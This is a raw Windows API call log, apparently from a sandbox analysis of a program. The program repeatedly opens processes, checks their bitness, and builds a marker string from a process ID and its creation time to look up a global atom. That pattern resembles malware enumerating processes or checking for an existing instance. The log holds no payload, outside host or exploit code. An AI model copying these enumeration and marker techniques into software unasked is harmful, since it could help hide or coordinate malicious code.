	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.578] CloseHandle (hObject=0x694) returned 1
	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.578] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.579] CloseHandle (hObject=0x694) returned 1
	[0103.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.579] CloseHandle (hObject=0x694) returned 1
	[0103.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.579] CloseHandle (hObject=0x694) returned 1
	[0103.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.579] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.579] CloseHandle (hObject=0x694) returned 1
	[0103.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.580] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.580] CloseHandle (hObject=0x694) returned 1
	[0103.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.580] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.580] CloseHandle (hObject=0x694) returned 1
	[0103.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.580] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.580] CloseHandle (hObject=0x694) returned 1
	[0103.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.580] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.580] CloseHandle (hObject=0x694) returned 1
	[0103.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.581] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.581] CloseHandle (hObject=0x694) returned 1
	[0103.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.581] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.581] CloseHandle (hObject=0x694) returned 1
	[0103.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.581] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.581] CloseHandle (hObject=0x694) returned 1
	[0103.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.581] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.581] CloseHandle (hObject=0x694) returned 1
	[0103.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.582] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.582] CloseHandle (hObject=0x694) returned 1
	[0103.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.582] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.582] CloseHandle (hObject=0x694) returned 1
	[0103.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.583] CloseHandle (hObject=0x694) returned 1
	[0103.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.583] CloseHandle (hObject=0x694) returned 1
	[0103.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.583] CloseHandle (hObject=0x694) returned 1
	[0103.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.583] CloseHandle (hObject=0x694) returned 1
	[0103.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.584] CloseHandle (hObject=0x694) returned 1
	[0103.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.584] CloseHandle (hObject=0x694) returned 1
	[0103.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.584] CloseHandle (hObject=0x694) returned 1
	[0103.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.584] CloseHandle (hObject=0x694) returned 1
	[0103.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.585] CloseHandle (hObject=0x694) returned 1
	[0103.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.585] CloseHandle (hObject=0x694) returned 1
	[0103.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.585] CloseHandle (hObject=0x694) returned 1
	[0103.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.585] CloseHandle (hObject=0x694) returned 1
	[0103.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.586] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.586] CloseHandle (hObject=0x694) returned 1
	[0103.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.586] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.586] CloseHandle (hObject=0x694) returned 1
	[0103.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.586] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.586] CloseHandle (hObject=0x694) returned 1
	[0103.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.586] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.586] CloseHandle (hObject=0x694) returned 1
	[0103.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.587] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.587] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.587] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.588] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.588] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.588] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.589] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.589] CloseHandle (hObject=0x694) returned 1
	[0103.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.589] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.589] CloseHandle (hObject=0x694) returned 1
	[0103.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.589] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.589] CloseHandle (hObject=0x694) returned 1
	[0103.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.653] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.653] CloseHandle (hObject=0x694) returned 1
	[0103.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.654] CloseHandle (hObject=0x694) returned 1
	[0103.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.654] CloseHandle (hObject=0x694) returned 1
	[0103.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.654] CloseHandle (hObject=0x694) returned 1
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.655] CloseHandle (hObject=0x694) returned 1
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.655] CloseHandle (hObject=0x694) returned 1
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.655] CloseHandle (hObject=0x694) returned 1
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.655] CloseHandle (hObject=0x694) returned 1
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0103.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.656] CloseHandle (hObject=0x694) returned 1
	[0103.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0103.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.656] CloseHandle (hObject=0x694) returned 1
	[0103.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0103.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.656] CloseHandle (hObject=0x694) returned 1
	[0103.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0103.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.656] CloseHandle (hObject=0x694) returned 1
	[0103.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0103.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.656] CloseHandle (hObject=0x694) returned 1
	[0103.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0103.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.657] CloseHandle (hObject=0x694) returned 1
	[0103.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0103.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.657] CloseHandle (hObject=0x694) returned 1
	[0103.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0103.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.657] CloseHandle (hObject=0x694) returned 1
	[0103.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0103.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.657] CloseHandle (hObject=0x694) returned 1
	[0103.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0103.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.657] CloseHandle (hObject=0x694) returned 1
	[0103.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0103.658] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.658] CloseHandle (hObject=0x694) returned 1
	[0103.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0103.658] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.658] CloseHandle (hObject=0x694) returned 1
	[0103.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0103.658] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.658] CloseHandle (hObject=0x694) returned 1
	[0103.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0103.658] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.658] CloseHandle (hObject=0x694) returned 1
	[0103.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0103.658] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.659] CloseHandle (hObject=0x694) returned 1
	[0103.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0103.659] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.659] CloseHandle (hObject=0x694) returned 1
	[0103.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0103.659] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.659] CloseHandle (hObject=0x694) returned 1
	[0103.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0103.659] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.659] CloseHandle (hObject=0x694) returned 1
	[0103.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0103.659] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.659] CloseHandle (hObject=0x694) returned 1
	[0103.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0103.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.660] CloseHandle (hObject=0x694) returned 1
	[0103.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0103.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.660] CloseHandle (hObject=0x694) returned 1
	[0103.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0103.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.660] CloseHandle (hObject=0x694) returned 1
	[0103.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.660] CloseHandle (hObject=0x694) returned 1
	[0103.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0103.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.661] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.661] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.661] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.662] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.662] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.662] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.662] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.662] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.662] CloseHandle (hObject=0x694) returned 1
	[0103.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0103.663] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.663] CloseHandle (hObject=0x694) returned 1
	[0103.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0103.663] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.663] CloseHandle (hObject=0x694) returned 1
	[0103.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0103.698] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.698] CloseHandle (hObject=0x694) returned 1
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0103.698] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.699] CloseHandle (hObject=0x694) returned 1
	[0103.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0103.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.699] CloseHandle (hObject=0x694) returned 1
	[0103.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0103.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.699] CloseHandle (hObject=0x694) returned 1
	[0103.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0103.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.699] CloseHandle (hObject=0x694) returned 1
	[0103.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0103.699] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.699] CloseHandle (hObject=0x694) returned 1
	[0103.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0103.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.700] CloseHandle (hObject=0x694) returned 1
	[0103.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0103.700] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
